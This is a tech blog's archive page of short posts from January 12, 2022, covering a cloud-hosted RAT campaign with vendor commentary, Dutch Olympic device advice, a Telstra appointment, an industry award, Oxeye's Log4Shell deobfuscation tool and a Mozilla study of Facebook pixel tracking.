Archive for January 12, 2022

New Remote Access Trojan Targeting AWS & Azure Cloud Services Discovered

Posted in Commentary with tags on January 12, 2022 by itnerd

Cisco Talos has today released new research showing a new RAT (Remote Access Trojan) campaign is abusing AWS and Azure cloud services since October 2021, spreading a trio of RAT payloads with the aim of stealing data from infected machines. In response to these findings, an expert with Gurucul has offered perspective. 

Saryu Nayyar, CEO and Founder, Gurucul offers this comment:

“The new RAT variant is a perfect example of why it is important to have a cloud-native and multi-cloud next generation threat detection solution like a next generation SIEM. Even more important is that non rule-based true machine learning capabilities are critical to detect emerging variants out of the box. Risk-based user behavioral detection and analytics are a requirement to help security teams pinpoint the unusual commands being executed, unexpected external communications and data leakage of credentials or financial information. As we’ve seen in many cases, integrated and automated response capabilities, when targeted and low-risk, can accelerate remediation in time to prevent theft.” 

This is clearly one of those cases where detection and prevention is the way to avoid being a victim of this RAT campaign. Hopefully those who rely on AWS and Azure workloads have the means to protect themselves.

UPDATE: I have this commentary from Stephanie Simpson who is the VP Product Management at SCYTHE

“Attacks against Remote Administration Tools RATs are nothing new. We’ve already seen them for technologies like NetWire and being used by cybercriminals like SlotfhfulMedia malware.  This is another case of threat actors changing their tactics, techniques, and practices (TTPs), adjusting to new environments. When testing security controls, organizations need to start thinking about the different ways that malicious actors are changing known TTPs to find new ways to attack systems.”

UPDATE #2: Chris Olson, CEO at The Media Trust had this to say:

“Today, most organizations are employing advanced SPAM filters and other forms of protection against traditional phishing channels, along with antivirus software to prevent malicious payloads from executing. But as we’ve seen many times before, cyber actors adapt to obstacles by changing their tactics – in this case, by deploying obfuscated code to escape detection, and dynamic DNS to prevent blocking.”

“But cloud-based attackers are little late to the game here, as we’ve seen both these tactics used for years in AdTech and web-based attacks. Consequently, we have warned our clients not to depend on simple ad blockers – equivalent to antivirus – or domain lists, which are rarely updated quickly enough to reflect the way cyber actors jump between different domain and ad partners.”

“In the future, we can expect cyberattacks to become more anonymized, dynamic, and harder to detect through automated methods. Organizations must work to better understand the code that is executing throughout their digital environment by continually monitoring activity and carefully vetting their IT partners.”



Dutch Olympic Committee To Dutch Athletes: Don’t Take Your Phones And Laptops To The Winter Olympics In China

Posted in Commentary with tags , on January 12, 2022 by itnerd

Right now, China doesn’t exactly have the best public perception when it comes to being trustworthy. That’s on display via this Reuters article where Dutch Athletes are being told by the Dutch Olympic Committee to leave their phones and laptops at home when they go to the Winter Olympics that are being held in China:

Dutch athletes competing in next month’s Beijing Winter Olympics will need to leave their phones and laptops at home in an unprecedented move to avoid Chinese espionage, Dutch newspaper De Volkskrant reported on Tuesday. The urgent advice to athletes and supporting staff to not bring any personal devices to China was part of a set of measures proposed by the Dutch Olympic Committee (NOCNSF) to deal with any possible interference by Chinese state agents, the paper said citing sources close to the matter. NOCNSF spokesman Geert Slot said cybersecurity was part of the risk assessment made for the trip to China, but declined to comment on any specific measure. “The importance of cybersecurity of course has grown over the years”, Slot said. “But China has completely closed off its internet, which makes it a specific case.”

It will be interesting to see how China reacts to this. If they say nothing, you have to wonder why as that it implies that China is actually doing something. But if they react in an angry manner, then you might say exactly the same thing. And I can see a scenario where if other countries copy the Dutch, then the Chinese might really freak out as a result.

Get the popcorn ready.

Telstra Appoints Vish Vishwanathan to Head Wholesale Group in the Americas

Posted in Commentary with tags on January 12, 2022 by itnerd

Telstra has named Vish Vishwanathan as Vice President of its Wholesale group for the Americas. He joins Telstra as the company is entering its latest phase of international growth and network expansion.  

Vishwanathan will take charge of Telstra’s existing business that serves telecom and satellite providers across North America, spearhead plans to extend the company’s reach across Latin America and expand its services capabilities to satellite operators. 

Vishwanathan will draw on his 30-plus years of experience in the telecommunications industry, successfully launching new technologies and services, leading sales organizations and developing new markets across the Americas, Europe and Asia. 

Vishwanathan previously led global IP network sales for NTT and has also held senior sales and market development roles at CenturyLink, MCI International and Motorola.

Telstra is a leading telecommunications and technology company with a proudly Australian heritage and a longstanding, growing international business. They have been operating in the Americas for over 25 years and provide data and IP transit, internet connectivity, network application services such as unified communications and cloud, and managed services to over 500 businesses in 160 cities in the region. Their products and services are supported by one of the largest fiber optic submarine cable systems reaching Asia-Pacific and beyond, with licenses in Asia, Europe and the Americas, and access to more than 2,000 points-of-presence around the world. Through their unparalleled network reach and reliability as well as market-leading customer service and expertise, they connect businesses in the Americas to some of the world’s fastest growing economies, including China, Southeast Asia, North Asia, and Australia. For more information, please visit www.telstra.com/americas.

Infosec Institute Named A Top 25 Cybersecurity Company By The Software Report 

Posted in Commentary with tags on January 12, 2022 by itnerd

Infosec Institute, a leading cybersecurity education company, announced that it was recognized by The Software Report as one of the Top 25 Cybersecurity Companies in 2021. The award celebrates cybersecurity companies that are committed to providing the most cutting-edge protection solutions for their customers.

The Software Report, a comprehensive source for market research and insights, selected Infosec from hundreds of nominations based on their leadership in the field and resounding feedback from industry professionals. Infosec was recognized alongside industry leaders like Palo Alto Networks, McAfee, Blackberry and BugCrowd. To be considered for the Top 25 list, each nominated organization had to:

  • Be a cybersecurity company demonstrating dominance in their respective category 
  • Demonstrate the effectiveness of their leadership teams 
  • Show an ability to establish a positive, inclusive working environment  

See the full list of 2021 Top 25 Cybersecurity Companies. 

Oxeye Claims To Mitigate Log4Shell Vulnerability With Ox4Shell Open-Source Payload Deobfuscation Tool

Posted in Commentary with tags on January 12, 2022 by itnerd

Oxeye, a technology innovator in cloud-native application security testing solutions, today unveiled the first 2022 open-source initiative with the introduction of Ox4Shell. The powerful and free open-source payload deobfuscation tool is the first in a series of solutions to be developed by Oxeye to assist developers, AppSec professionals, and the open-source community. Ox4Shell is designed to confront what some are calling the “Covid of the Internet,” known as the Log4Shell zero-day vulnerability. To counter a very effective obfuscation tactic used by malicious actors, Oxeye’s new open-source tool (available on GitHub) exposes hidden payloads which are actively being used to confuse security protection tools and security teams.

As reported by experts, organizations globally continue to experience remote code attacks and the exposure of sensitive data due to the pervasive Log4Shell vulnerability. Discovered in Apache’s Log4J, a logging system in widespread use by web and server application developers, the threat makes it possible to inject text into log messages or log message parameters, then into server logs which can then load code from a remote server for malicious use. Apache has given Log4Shell a CVSS severity rating of 10 out of 10, the highest possible score. Since then, researchers found a similar vulnerability in the popular H2 database. The exploit is simple to execute and is estimated to affect hundreds of millions of devices. 

As part of a new open-source initiative for 2022, Oxeye is unveiling the first in a series of contributions designed to strengthen security efforts by deobfuscating payloads often coupled with Log4J exploits. Ox4Shell exposes obscured payloads and transforms them into more meaningful forms to provide a clear understanding of what threat actors are trying to achieve. This allows concerned parties to take immediate action and resolve the vulnerability.

The Log4j library has a few unique lookup functions that permit users to look up environment variables, Java process runtime information, and so forth. These enable threat actors to probe for specific information that can uniquely identify a compromised machine they’ve targeted. Ox4Shell enables you to comply with such lookup functions by feeding them mock data that you control. 

Availability
Ox4Shell is generally available on GitHub at no charge. Oxeye invites developers and security professionals interested in learning more to visit https://www.oxeye.io/ox4shell-deobfuscate-log4shell or to download the software at https://github.com/ox-eye/Ox4Shell. To schedule a personalized demo of the full Oxeye Cloud Native Application Security Testing (CNAST) platform, please visit https://www.oxeye.io/get-a-demo.

Mozilla Is Going To Track Facebook Tracking You Via A Study With Journalists

Posted in Commentary with tags , on January 12, 2022 by itnerd

This should be interesting.

Mozilla has announced that they are starting a study and it involves figuring out how Facebook tracks you:

In a collaboration between journalists at The Markup and Mozilla researchers, this study seeks to map Facebook’s pixel tracking network and understand the kinds of information it collects on sites across the web. The Markup will use the data collected in this study to create investigative journalism around the kinds of information Facebook collects about you, and where.

And:

According to its own privacy policy, Facebook may collect information about you across the web even if you don’t have a Facebook account. One way Facebook performs this tracking is through a network of “pixels” that may be installed on many of the sites you visit. By joining this study, you will help Rally and The Markup investigate and report on where Facebook is tracking you and what kind of information they are collecting.

Now this is going to be very interesting to see what data Facebook is actually collecting as I am pretty sure that they are likely not being truthful about that. But I guess we’re about to find out. If you want to participate, you will need to download Mozilla Rally which is a browser extension that will collect data sent out by Facebook’s pixels as you browse across the web. Aside from that data, the extension also keeps track of the time spent on different web pages, the URLs that the browser visits, and more. Mozilla was quick to note in its announcement that the only data being exported from the extension will be de-identified, and not shared with any third parties besides the Markup’s reporters. And I believe that as I have a lot more trust in Mozilla than I do in Facebook.